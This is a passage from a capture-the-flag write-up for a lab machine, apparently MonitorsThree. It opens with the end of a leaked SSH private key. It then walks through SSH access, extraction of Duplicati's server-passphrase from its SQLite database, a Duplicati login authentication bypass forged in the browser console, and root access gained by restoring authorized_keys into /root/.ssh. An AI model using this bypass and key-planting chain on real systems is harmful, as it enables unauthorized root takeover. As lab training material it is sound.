y7xTo2s8fvepCx+MWL9D3R9y+daUeH1dBdxjUE2gosC+64gA2iF0VZ5qDZyq4ShKE0A+Wq
4sTOk1lxZI4pVbNhmCMyjbJ5fnWYbd8Z5MwlqmlVNzZuC+LQlKpKhPBbcECZ6Dhhk5Pskh
316YytN50Ds9f+ueqxGLyqY1rHiMrDAAAAwQDN4jV+izw84eQ86/8Pp3OnoNjzxpvsmfMP
BwoTYySkRgDFLkh/hzw04Q9551qKHfU9/jBg9BH1cAyZ5rV/9oLjdEP7EiOhncw6RkRRsb
e8yphoQ7OzTZ0114YRKdafVoDeb0twpV929S3I1Jxzj+atDnokrb8/uaPvUJo2B0eDOc7T
z6ZnzxAqKz1tUUcqYYxkCazMN+0Wx1qtallhnLjy+YaExM+uMHngJvVs9zJ2iFdrpBm/bt
PA4EYA8sgHR2kAAAAUbWFyY3VzQG1vbml0b3JzdGhyZWUBAgMEBQYH
-----END OPENSSH PRIVATE KEY-----

Copy and paste the id_rsa into local machine file and change the permissions.

chmod 600 id_rsa

ssh -i id_rsa marcus@10.10.11.30
Last login: Tue Aug 20 11:34:00 2024
marcus@monitorsthree:~$

The user.txt file contains the user flag 👏

Pillaging - marcus [user]

The marcus user is running the duplicati service in port 8200.

Duplicati is a free, open-source backup client that securely stores encrypted, incremental, and compressed backups on cloud storage services and remote file servers.

marcus@monitorsthree:~$ netstat -tlnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8084            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:44967         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8200          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -  

marcus@monitorsthree:~$ wget http://127.0.0.1:8200
--2025-01-15 03:50:11--  http://127.0.0.1:8200/
Connecting to 127.0.0.1:8200... connected.
HTTP request sent, awaiting response... 302 Redirect
Location: /login.html [following]
--2025-01-15 03:50:11--  http://127.0.0.1:8200/login.html
Reusing existing connection to 127.0.0.1:8200.
HTTP request sent, awaiting response... 200 OK
Length: 1239 (1.2K) [text/html]
Saving to: ‘index.html’

index.html                                  100%[========================================================================================>]   1.21K  --.-KB/s    in 0.04s   

2025-01-15 03:50:11 (30.0 KB/s) - ‘index.html’ saved [1239/1239]

marcus@monitorsthree:~$ cat index.html

<!doctype html>
<html>
<head>
    <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    
    <title>Duplicati Login</title>
    
    <script type="text/javascript" src="login/jquery-2.0.3.min.js"></script>
    <script type="text/javascript" src="login/cryptojs.js"></script>
    <script type="text/javascript" src="login/login.js?v=2.0.8.1"></script>
    <link rel="stylesheet" type="text/css" href="login/login.css?v=2.0.8.1" />

    <script type="text/javascript" src="oem/root/login/oem.js?v=2.0.8.1" ></script>
    <link rel="stylesheet" type="text/css" href="oem/root/login/oem.css?v=2.0.8.1" />
</head>

<body>
    <div id="login">
        <h2>Duplicati</h2>
        <form method="POST">
            <fieldset>

                <p><label for="login-password">Password</label></p>
                <p><input type="password" id="login-password" value="password" onBlur="if(this.value=='')this.value='password'" onFocus="if(this.value=='password')this.value=''" autofocus></p> <!-- JS because of IE support; better: placeholder="password" -->

                <p><input type="submit" id="login-button" value="Sign In"></p>

            </fieldset>
        </form>
    </div>
</body>    
</html>

Searching the duplicti folder leads us to config folder which contains the Duplaciti-server.sqlite file.

marcus@monitorsthree:~$ cd /
marcus@monitorsthree:/$ find -type d -name duplicati 2>/dev/null
./opt/duplicati
marcus@monitorsthree:/$ cd /opt/duplicati
marcus@monitorsthree:/opt/duplicati$ ls
config
marcus@monitorsthree:/opt/duplicati$ cd config
marcus@monitorsthree:/opt/duplicati/config$ ls
control_dir_v2  CTADPNHLTC.sqlite  Duplicati-server.sqlite
marcus@monitorsthree:/opt/duplicati/config$ 

Downloading the Duplicati-server.sqlite using scp and enumearting it using sqlite3.

scp -i id_rsa marcus@10.10.11.30:/opt/duplicati/config/Duplicati-server.sqlite .

sqlite3 Duplicati-server.sqlite
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
Backup        Log           Option        TempFile    
ErrorLog      Metadata      Schedule      UIStorage   
Filter        Notification  Source        Version     

Exploit - Duplicati Login Authentication Bypass with server-passphrase

The duplicati is vulnerable to login authentication using server-passphrase. The below post shows us the PoC for duplicati login bypass using server-passphrase.

Duplicati: Bypassing Login Authentication With Server-passphraseMedium

• Port Forward the 8200 port via ssh.

ssh -i id_rsa -L 8200:localhost:8200 marcus@10.10.11.30

• The Duplicati-server.sqlite contains the server-passphare in Option table.

sqlite> SELECT * FROM Option;
4||encryption-module|
4||compression-module|zip
4||dblock-size|50mb
4||--no-encryption|true
-1||--asynchronous-upload-limit|50
-1||--asynchronous-concurrent-upload-limit|50
-2||startup-delay|0s
-2||max-download-speed|
-2||max-upload-speed|
-2||thread-priority|
-2||last-webserver-port|8200
-2||is-first-run|
-2||server-port-changed|True
-2||server-passphrase|Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
-2||server-passphrase-salt|xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
-2||server-passphrase-trayicon|5e7d1ded-124e-4139-af7b-1b4b40026a0f
-2||server-passphrase-trayicon-hash|yU1y7roWxv5XAV8DzSRBJLC47Re67GycGbvuqn2XDvo=
-2||last-update-check|638724745250801590
-2||update-check-interval|
-2||update-check-latest|
-2||unacked-error|False
-2||unacked-warning|False
-2||server-listen-interface|any
-2||server-ssl-certificate|
-2||has-fixed-invalid-backup-id|True
-2||update-channel|
-2||usage-reporter-level|
-2||has-asked-for-password-protection|true
-2||disable-tray-icon-login|false
-2||allowed-hostnames|*
sqlite> 

• The login.js has a login logic. It can be used to craft the password and authenticate our-self.

var saltedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Utf8.parse($('#login-password').val()) + CryptoJS.enc.Base64.parse(data.Salt)));
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);

The salt value is converted into base64 and then into hexdecimal.

• Intercept the duplicati login request using burpsuite. Don't forward the login.cgi POST request with password parameter and get the nounce. The salt also matches with the duplicati database.

• Convert the server-passphrase value into base64 and then into hexadecimal.

echo Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho= | base64 -d | xxd -p -c 128
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a

• Once we get the above hex we can generate the valid password using above hex and nounce.

• Open the dev-tool console and paste the below code.

var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a'; 
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('FDes7AvOEeG0FvjYjZRI2Cn0NojhpthKsIuxvsbzF+I=') + saltedpwd)).toString(CryptoJS.enc.Base64);
console.log(noncedpwd);

• Copy the printed string in console and paste it into password paramater. URL encode the password by pressing Ctrl + U then forward the request.

• If successful we will get the duplicati index page or we will get the authentication fail alter.

• 

Shell - root

The accessed duplicati can be used to copy the content of the system and restore it into marcus home directory or vice-versa. I tried backing up the id_rsa of root user but it was not present. The marcus has a authorized_keys file in /home/marcus/.ssh directory which we can backup and restore it into /root/.ssh directory and we can ssh into root from marus.

• Create the backup of authorized_keys and restore it into the /root/.ssh directory.

Creating Backup

Restoring backup

marcus@monitorsthree:~$ ssh root@10.10.11.30
The authenticity of host '10.10.11.30 (10.10.11.30)' can't be established.
ED25519 key fingerprint is SHA256:1llzaKeglum8R0dawipiv9mSGU33yzoUW3frO9MAF6U.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.30' (ED25519) to the list of known hosts.
Last login: Tue Aug 20 15:21:21 2024
root@monitorsthree:~# 

The root.txt file contains the root flag 🎉

Proof of Concept

The below video provides the PoC of MonitorsThree machine.